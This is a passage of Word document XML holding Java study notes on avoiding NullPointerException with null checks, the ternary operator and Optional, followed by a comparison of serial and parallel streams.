      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F257DFE"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 This will throw NullPointerException with a custom message if 'name' is null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F5B81"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314642B9"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Objects.requireNonNull(name, "Name cannot be null");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A8B65"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 catch (NullPointerException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4299E0"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System.out.println("Caught exception: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55160DB3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A187860"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEC761"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3992C" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Using Ternary Operator or Null Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D80B04"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Before performing operations on an object, you can manually check for null values to avoid a NullPointerException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B9715"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public class NPEExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FD96B" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5054C113"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FE29F"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String name = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B25DD1A" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A02B81"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 Traditional null check to avoid NPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B1AD7B"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if (name != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60593BAC"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System.out.println("Name length: " + name.length());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A531637"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408828ED"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System.out.println("Name is null");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296E9FC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329B32E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB9C69"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC243C"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Alternatively, you can use the ternary operator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7058F"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public class NPEExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529D3137"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375E4E4"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String name = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDAFDD6"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int length = (name != null) ? name.length() : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848A9B9"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System.out.println("Name length: " + length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3F3C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBDD66"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F99686" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Optional and Method References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77109846"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You can combine </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with method references to streamline null-safe operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AEB089"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import java.util.Optional;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B76265" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20468261"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public class NPEExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0473DE"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DDE111"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String name = "John Doe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181025B7" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E839D78"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 Using Optional with method reference to avoid NPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3CE314"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Optional.ofNullable(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE051FA"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map(String::toUpperCase) // Convert name to upper case if not null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5CA3F"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ifPresent(System.out::println); // Print if present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1CB869"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB9924"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708EE3CD" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C614A0" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>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Optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class is the primary way to handle NullPointerException in Java 8 and helps you work with potentially null values in a more declarative way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12205B" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Objects.requireNonNull()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help validate that an object is not null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087021EC" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>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Use traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ternary operator</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as fallback methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D20C90" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:num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 xml:space="preserve">You can combine </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to keep the code clean and concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2538C223" w14:textId="77777777" w:rsidR="006E761D" w:rsidRPr="00397A42" w:rsidRDefault="006E761D" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using these modern techniques helps in writing cleaner, more maintainable code while preventing NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21005991" w14:textId="274D8509" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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578D343">
          <v:rect id="_x0000_i1775" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FA6DC" w14:textId="4B155E9F" w:rsidR="0095652C" w:rsidRPr="00CE4B95" w:rsidRDefault="0095652C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="_Toc196307728"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Parallel Stream and Serial Stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w14:paraId="2D71FE8E" w14:textId="2052DB73" w:rsidR="0095652C" w:rsidRPr="00CE4B95" w:rsidRDefault="0095652C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8E1BDA" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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erial Stream (Sequential Stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF4520"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ocesses elements one by one in a single thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BA8AE"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llows the original order of the data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A2DCB3"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afer for tasks where order matters or there are side effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF98F6D" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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403EE04C" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B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037371"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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number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4</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p>
    <w:p w14:paraId="472F9774" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B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037371"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>numbe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p>
    <w:p w14:paraId="2340FBEA" w14:textId="7EDCB690" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B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03737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orEach</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ingle-threaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86C277" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006E4B8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BC71B1A">
          <v:rect id="_x0000_i1776" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF1D4E" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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Parallel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79741D83"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ocesses elements concurrently using multiple threads (Fork/Join framework).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D252B"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significantly improve performance for large datasets or CPU-intensive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7E91F"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rder is not guaranteed unless explicitly handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6FF8A"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itable for stateless, independent, and non-blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A60A3A" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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302E0810" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B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1624863"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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number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4</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p>
    <w:p w14:paraId="70F815BE" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B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1624863"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>numbe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arallelStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE1E34" w14:textId="7B64E28D" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B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162486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orEach</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ulti-threaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F2F5E" w14:textId="52405208" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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1"/>
        <w:gridCol w:w="2698"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="285413BE" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1468FD85" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="00D54629">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1AD29F06" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="00D54629">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erial Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2B7C81" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="00D54629">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arallel Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="0A812FC7" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C862050"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ecution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00927110"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gle-threaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0817AE"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ulti-threaded (ForkJoinPool)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="4EAEDFEB" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1912A1CD"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AD5EFA7"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lower for large data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C57C85F"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aster for large, CPU-heavy tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="309921B0" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25D11A82"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rder Preservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61F2A26D"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intains order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="344E0817"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rder is not guaranteed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="5B7DFD1E" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAE33C7"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read-Safety Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F054724"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t always</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2886EEA5"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 thread-safety is important</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="04FB959F" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B644530"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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20BEFB63"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mall datasets, order matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
